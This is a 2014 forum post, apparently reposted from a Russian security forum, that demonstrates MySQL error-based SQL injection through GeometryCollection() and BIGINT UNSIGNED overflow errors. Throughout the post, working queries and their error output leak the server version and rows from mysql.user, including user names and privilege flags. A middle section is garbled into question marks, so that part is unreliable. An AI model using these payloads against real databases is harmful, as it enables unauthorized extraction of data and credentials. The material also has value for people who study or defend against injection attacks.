Nytro Posted September 30, 2014 Report Posted September 30, 2014 By spariearlier today, i got some spare time, and played a little with the function GeometryCollection().basically, this function constructs geometry collection.sounds nice. but the interesting part is, we can only use it with adjusted function, like point(x,y).for example- mysql> SELECT GeometryCollection(point(53,12)); and output- +----+---------------------------+ |GeometryCollection(point(53,12))| |geometry(4294967295) | +----+---------------------------+ |??? ?? | +----+---------------------------+ as we can see, the output is some gibberish.now lets try it without POINT()- mysql> SELECT GeometryCollection(53,12); Error 1367 (22007): Illegal non geometric '53' value found during parsing wow, wait, what?we got an error on our x argument, 53.GeometryCollection() cant process this, because GeometryCollection() dont know how to recognize x,y.after i saw that, i thought "why stop here?", maybe i can play with this a little more.so, as expected () i tried to pull out the version, like that- PHP ???: mysql> SELECT GeometryCollection(a) from (select version()a)x; Error 1367 (22007): Illegal non geometric '`x`.`a`' value found during parsing mmm.. only possible to see the alias. not good enough.but wait, if we can see the alias, so maybe NAME_CONST() will do the trick?well, no. theoretically yes, but the problem is we cant call it.from here, the way to exploitation was really short- mysql>SELECT GeometryCollection((select*from(select*from(select@@version)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`@@version` from (select '5.5.38-35.2' AS `@@version` from dual) `x`)' value found during parsing and we get a short, new error based, without spaces and commas.lets try pull out more stuff, maybe some columns from mysql.user- mysql>SELECT GeometryCollection((select*from(select*from(select group_concat(user,file_priv) from mysql.user)f)x)); Error 1367 (22007): Illegal non geometric '(select `x`.`group_concat(user,file_priv)` from (select 'localhostY,rootY' AS `group_concat(user,file_priv)` from dual) `x`)' value found during parsing hope i expand your mind comments will be nice.??????? ?? ???????? ??? ?????????????? error-based ???????. ??? ????? ?????? ? ?????????? ????. ?? ????? ?? ??? ?????? ? ????? ?? ?????????? ???????????. ???? ??????, ?????? ???????????? ?? ?????? ???????????? ???? ?????? (?? ??????????? ??????): mysql> SELECT 18446744073709551610 * 2;ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)'mysql> SELECT -1 * 9223372036854775808;ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(-(1) * 9223372036854775808)' ? ?????? ????????? ??????? ???????, ?????? ??? ?????? ????????? ?? ?? ??????????, ??? ???????? ?????: mysql> SELECT 123 abc d;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'd' at line 1 ? ?? ?????, ??-?? ???? ????? ????????? ??????????? ? ???????? ??????? ? ???????? ???, ??? ???????? ?? ???????: mysql> SELECT 2*(if((SELECT * from (SELECT (version()))s), 18446744073709551610, 18446744073709551610));ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if((select '5.5' from dual),18446744073709551610,18446744073709551610))'// ?????: 452 ??????? ? ???? ??????: ???: mysql> SELECT 2 * if((SELECT * from (select * from test.shop) as `` limit 1)>(SELECT * from test.shop limit 1), 18446744073709551610, 18446744073709551610);ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` AS `article`,`test`.`shop`.`dealer` AS `dealer`,`test`.`shop`.`price` AS `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))'// ?????? ????? ??????? ? ??????? ? ??? ??????: ???: mysql> SELECT 2 * if((SELECT * from (select * from (mysql.user) LIMIT 1) as `` limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2), 18446744073709551610, 18446744073709551610);ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(2 * if(((select 'localhost','root','*','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','Y','','','','','0','0','0','0','','' from dual limit 1) < (1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2)),18446744073709551610,18446744073709551610))'// ??????? ?????? ?? ???? ??????? ????? Mai multe aici: https://rdot.org/forum/showthread.php?p=37133Si aici: https://rdot.org/forum/showthread.php?t=3167 Quote
